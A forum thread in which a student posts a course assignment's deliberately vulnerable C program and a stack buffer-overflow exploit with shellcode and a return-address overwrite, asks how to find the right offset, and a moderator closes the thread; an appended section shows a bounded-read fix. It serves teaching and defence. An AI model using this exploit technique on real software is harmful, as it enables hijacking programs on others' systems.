Offset values and shellcode size.


  1. #1
    Registered User
    Join Date
    Apr 2012
    Posts
    1

    Offset values and shellcode size.

    So, I was given these two codes (vuln.c and exploit.c). My assignment was to describe the programs, explain the purpose of each of the statements, compile them and run the following sequence of commands:


    gcc vuln.c -o vuln
    gcc exploit.c -o exploit
    ./exploit


    -----supposed to get an output------------
    Using Offset: 0xbffff310
    Shellcode size: 38


    --------the output I get------------
    Using Offset: 0x836c861c
    Shell code Size: 38


    -------------then--------------------------
    od -t x2 badfile
    ./vuln


    ---------------the final output--------------------
    GOTCHA!



    Here are the codes:
    ----------------------------------------------
    vuln.c
    -----------------------------------------------
    Code:
    #include <stdlib.h>
    #include <stdio.h>

    int bof()
    {
        char buffer[8];
        FILE *badfile;

        badfile = fopen("badfile", "r");
        /* Asks for up to 1024 bytes but buffer holds only 8: anything past
           the eighth byte is written over adjacent stack memory. */
        fread(buffer, sizeof(char), 1024, badfile);
        return 1;
    }

    int main(int argc, char **argv)
    {
        bof();
        printf("Not gonna do it! \n");
        return 1;
    }

    ----------------------------------------------------
    exploit.c
    ----------------------------------------------------
    Code:
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
     
    char shellcode[] =
     
     "\xeb\x16"
     "\x31\xdb"
     "\x31\xd2"
     "\x31\xc0"
     "\x59"
     "\xbb\x01\x00\x00\x00"
     "\xb2\x09"
     "\xb0\x04"
     "\xcd\x80"
     "\xb0\x01"
     "\xcd\x80"
     "\xe8\xe5\xff\xff\xff"
     "GOTCHA!\n"
    ;
     
    #define OFFSET 1500
     
    int bof()
    {
       char buffer[8];
       strcpy(buffer, "AAAAAAAAA");
       return 1;
    }
     
    unsigned long get_ESP(void)
    {
          __asm__("movl %ESP,%EAX");
    }
     
    int main(int argc, char **argv)
    {
     
      unsigned long addr;
      FILE *badfile;
      char buffer[1024];
     
      addr = get_ESP()+OFFSET;
      fprintf(stderr, "Using Offset: 0x%lx\nShell code size: %zu\n",
                       addr, sizeof(shellcode) );
     
      memset(&buffer, 0x90, 1024);
     
     
      buffer[12] = addr & 0x000000ff;
      buffer[13] = (addr & 0x0000ff00) >> 8;
      buffer[14] = (addr & 0x00ff0000) >> 16;
      buffer[15] = (addr & 0xff000000) >> 24;
      memcpy( &buffer[ (sizeof(buffer) - sizeof(shellcode)) ],
                shellcode,sizeof(shellcode) );
     
      badfile = fopen("./badfile","w");
      fwrite(buffer,1024,1,badfile);
      fclose(badfile);
     
    }

    So, I got the output to show the correct shellcode size, which is 38, but I couldn't figure out a way to change the "Using Offset" value and get "GOTCHA!" when I execute vuln after exploit.

    To put it simply, I need to figure out how I can get the correct "Using Offset" value.

    Thank you and sorry for the long post.
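
Added example, not part of the original post or the assignment code: a bounded version of the read in vuln.c's bof(), which asks fread for 1024 bytes into an 8-byte buffer. The helper names, the sample file name and the guard bytes are assumptions made for this illustration, and the 1024-byte input is constructed.

```c
#include <stdio.h>
#include <string.h>

#define BUF_LEN 8  /* same size as buffer[] in vuln.c */

/* Hardened counterpart of bof() (hypothetical helper, not from the thread):
 * stores at most cap bytes from path in dst. Returns the byte count, or -1
 * if the file cannot be opened; *oversized is set when input was left over. */
long read_bounded(const char *path, char *dst, size_t cap, int *oversized)
{
    FILE *f = fopen(path, "rb");
    if (f == NULL) return -1;            /* vuln.c never checks this */
    size_t n = fread(dst, 1, cap, f);    /* count tied to the destination size */
    *oversized = (fgetc(f) != EOF);      /* more data than the buffer holds? */
    fclose(f);
    return (long)n;
}

/* Writes a constructed sample input: len bytes of 'A'. Returns 0 on success. */
int write_sample(const char *path, size_t len)
{
    FILE *f = fopen(path, "wb");
    if (f == NULL) return -1;
    for (size_t i = 0; i < len; i++)
        fputc('A', f);
    return fclose(f) == 0 ? 0 : -1;
}

/* Reads a 1024-byte sample into an 8-byte buffer followed by guard bytes.
 * Returns 1 if exactly BUF_LEN bytes were stored, the input was flagged as
 * oversized, and every guard byte is unchanged. */
int demo_guard_intact(const char *path)
{
    struct { char buffer[BUF_LEN]; unsigned char guard[8]; } frame;
    int oversized = 0;
    memset(frame.guard, 0x5A, sizeof frame.guard);
    if (write_sample(path, 1024) != 0) return 0;
    long n = read_bounded(path, frame.buffer, sizeof frame.buffer, &oversized);
    remove(path);
    for (size_t i = 0; i < sizeof frame.guard; i++)
        if (frame.guard[i] != 0x5A) return 0;
    return n == BUF_LEN && oversized;
}

int main(void)
{
    printf("guard intact: %d\n", demo_guard_intact("sample_input.bin"));
    return 0;
}
```

Passing `sizeof frame.buffer` as the count is the whole fix; the `oversized` flag lets the caller reject the input instead of silently truncating it.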

  2. #2
    C++ Witch laserlight
    Join Date
    Oct 2003
    Location
    Singapore
    Posts
    21,439
    I understand that this is an academic assignment, but we generally do not discuss these sorts of things here, so I shall close this thread.
    C + C++ Compiler: MinGW port of GCC
    Version Control System: Bazaar

    Look up a C++ Reference and learn How To Ask Questions The Smart Way
